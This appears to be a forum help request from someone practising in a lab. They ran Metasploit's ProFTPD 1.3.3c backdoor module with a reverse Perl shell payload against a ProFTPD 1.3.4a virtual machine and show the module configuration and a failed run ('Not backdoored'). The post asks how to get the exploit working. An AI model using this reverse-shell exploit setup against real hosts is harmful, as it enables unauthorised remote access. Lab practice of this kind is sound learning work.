I wanted to practice exploiting system using proftpd backdoor. I use the exploit proftpd_133c_backdoor and the payload reverse_perl.I learned on how to exploit using this link, https://www.youtube.com/watch?v=1Rp5_QysRpE&t=2s.
My attacker virtual machine is 192.168.19.2. My victim virtual machine is 192.168.19.5(proftpd 1.3.4a.) The port opened on the victim is 21 and the version name is proFTPD 1.3.4a
Here is the configuration of the exploit and the payload below.
msf exploit(unix/ftp/proftpd_133c_backdoor) > show options
Module options (exploit/unix/ftp/proftpd_133c_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.19.5 yes The target address
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.19.2 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
then I exploited it however it states not backdoor. the result is shown below.
msf exploit(unix/ftp/proftpd_133c_backdoor) > exploit
[*] Started reverse TCP double handler on 192.168.19.2:4444
[*] 192.168.19.5:21 - Sending Backdoor Command
[-] 192.168.19.5:21 - Not backdoored
[*] Exploit completed, but no session was created.
What are the solutions to achieve this exploit? and how to do it?Please help me. thank you.